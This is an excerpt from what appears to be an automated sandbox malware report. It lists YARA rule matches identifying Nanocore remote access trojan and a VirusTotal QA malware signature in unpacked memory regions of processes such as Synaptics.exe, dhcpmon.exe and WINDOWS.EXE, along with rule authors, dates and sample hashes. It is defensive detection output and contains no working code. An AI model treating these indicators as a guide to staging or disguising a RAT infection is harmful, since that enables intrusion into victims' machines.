            Source: 0.2.y8kdmHi6x3.exe.44fa750.5.unpack, type: UNPACKEDPE; Matched rule: Nanocore_RAT_Gen_2, date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 0.2.y8kdmHi6x3.exe.44fa750.5.unpack, type: UNPACKEDPE; Matched rule: Nanocore_RAT_Feb18_1, date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 0.2.y8kdmHi6x3.exe.44fa750.5.unpack, type: UNPACKEDPE; Matched rule: NanoCore, date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 21.0.Synaptics.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPE; Matched rule: Nanocore_RAT_Gen_2, date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 21.0.Synaptics.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPE; Matched rule: NanoCore, date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 19.2.dhcpmon.exe.35f3dc4.1.raw.unpack, type: UNPACKEDPE; Matched rule: Nanocore_RAT_Gen_2, date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 19.2.dhcpmon.exe.35f3dc4.1.raw.unpack, type: UNPACKEDPE; Matched rule: Nanocore_RAT_Feb18_1, date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 20.0.Synaptics.exe.4b8e54.34.raw.unpack, type: UNPACKEDPE; Matched rule: Nanocore_RAT_Gen_2, date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.4b8e54.34.raw.unpack, type: UNPACKEDPE; Matched rule: Malware_QA_update, date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 20.0.Synaptics.exe.4b8e54.34.raw.unpack, type: UNPACKEDPE; Matched rule: NanoCore, date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 6.2.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, type: UNPACKEDPE; Matched rule: Nanocore_RAT_Gen_2, date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 6.2.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, type: UNPACKEDPE; Matched rule: Malware_QA_update, date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 6.2.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, type: UNPACKEDPE; Matched rule: NanoCore, date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE; Matched rule: Nanocore_RAT_Gen_2, date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE; Matched rule: NanoCore, date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 23.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPE; Matched rule: Nanocore_RAT_Gen_2, date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 23.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPE; Matched rule: Malware_QA_update, date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 23.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPE; Matched rule: NanoCore, date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 6.0.._cache_y8kdmHi6x3.exe.48e4dc.1.unpack, type: UNPACKEDPE; Matched rule: Nanocore_RAT_Gen_2, date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 6.0.._cache_y8kdmHi6x3.exe.48e4dc.1.unpack, type: UNPACKEDPE; Matched rule: Nanocore_RAT_Feb18_1, date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 6.0.._cache_y8kdmHi6x3.exe.48e4dc.1.unpack, type: UNPACKEDPE; Matched rule: NanoCore, date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 21.0.Synaptics.exe.4b8e54.24.raw.unpack, type: UNPACKEDPE; Matched rule: Nanocore_RAT_Gen_2, date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 21.0.Synaptics.exe.4b8e54.24.raw.unpack, type: UNPACKEDPE; Matched rule: Malware_QA_update, date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 21.0.Synaptics.exe.4b8e54.24.raw.unpack, type: UNPACKEDPE; Matched rule: NanoCore, date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 21.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPE; Matched rule: Nanocore_RAT_Gen_2, date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 21.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPE; Matched rule: Malware_QA_update, date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 21.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPE; Matched rule: NanoCore, date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 23.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPE; Matched rule: Nanocore_RAT_Gen_2, date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 23.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPE; Matched rule: Malware_QA_update, date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 23.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPE; Matched rule: NanoCore, date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPE; Matched rule: Nanocore_RAT_Gen_2, date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPE; Matched rule: Malware_QA_update, date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 20.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPE; Matched rule: NanoCore, date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 9.2.WINDOWS.EXE.400000.0.unpack, type: UNPACKEDPE; Matched rule: Nanocore_RAT_Gen_2, date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 9.2.WINDOWS.EXE.400000.0.unpack, type: UNPACKEDPE; Matched rule: NanoCore, date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 16.2.._cache_WINDOWS.EXE.3353bdc.1.raw.unpack, type: UNPACKEDPE; Matched rule: Nanocore_RAT_Gen_2, date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 16.2.._cache_WINDOWS.EXE.3353bdc.1.raw.unpack, type: UNPACKEDPE; Matched rule: Nanocore_RAT_Feb18_1, date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 23.2.Synaptics.exe.4b8e54.3.unpack, type: UNPACKEDPE; Matched rule: Nanocore_RAT_Gen_2, date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 23.2.Synaptics.exe.4b8e54.3.unpack, type: UNPACKEDPE; Matched rule: Malware_QA_update, date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 23.2.Synaptics.exe.4b8e54.3.unpack, type: UNPACKEDPE; Matched rule: NanoCore, date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.0.y8kdmHi6x3.exe.400000.8.unpack, type: UNPACKEDPE; Matched rule: Nanocore_RAT_Gen_2, date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.0.y8kdmHi6x3.exe.400000.8.unpack, type: UNPACKEDPE; Matched rule: Malware_QA_update, date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 4.0.y8kdmHi6x3.exe.400000.8.unpack, type: UNPACKEDPE; Matched rule: NanoCore, date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 16.2.._cache_WINDOWS.EXE.437ebcc.4.raw.unpack, type: UNPACKEDPE; Matched rule: Nanocore_RAT_Gen_2, date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 16.2.._cache_WINDOWS.EXE.437ebcc.4.raw.unpack, type: UNPACKEDPE; Matched rule: Nanocore_RAT_Feb18_1, date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 21.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 21.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 23.0.Synaptics.exe.4b8e54.23.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 23.0.Synaptics.exe.4b8e54.23.raw.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 23.0.Synaptics.exe.4b8e54.23.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 20.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 11.2.._cache_WINDOWS.EXE.3bdebcc.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 11.2.._cache_WINDOWS.EXE.3bdebcc.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 20.0.Synaptics.exe.4b8e54.28.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.4b8e54.28.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 20.0.Synaptics.exe.4b8e54.28.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.0.Synaptics.exe.584130.29.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.584130.29.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 20.0.Synaptics.exe.584130.29.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 20.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 19.0.dhcpmon.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 19.0.dhcpmon.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 19.0.dhcpmon.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 23.0.Synaptics.exe.584130.24.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 23.0.Synaptics.exe.584130.24.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 23.0.Synaptics.exe.584130.24.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 11.2.._cache_WINDOWS.EXE.3be31f5.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 11.2.._cache_WINDOWS.EXE.3be31f5.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 4.2.y8kdmHi6x3.exe.584130.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.2.y8kdmHi6x3.exe.584130.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 4.2.y8kdmHi6x3.exe.584130.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 9.0.WINDOWS.EXE.4b8e14.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
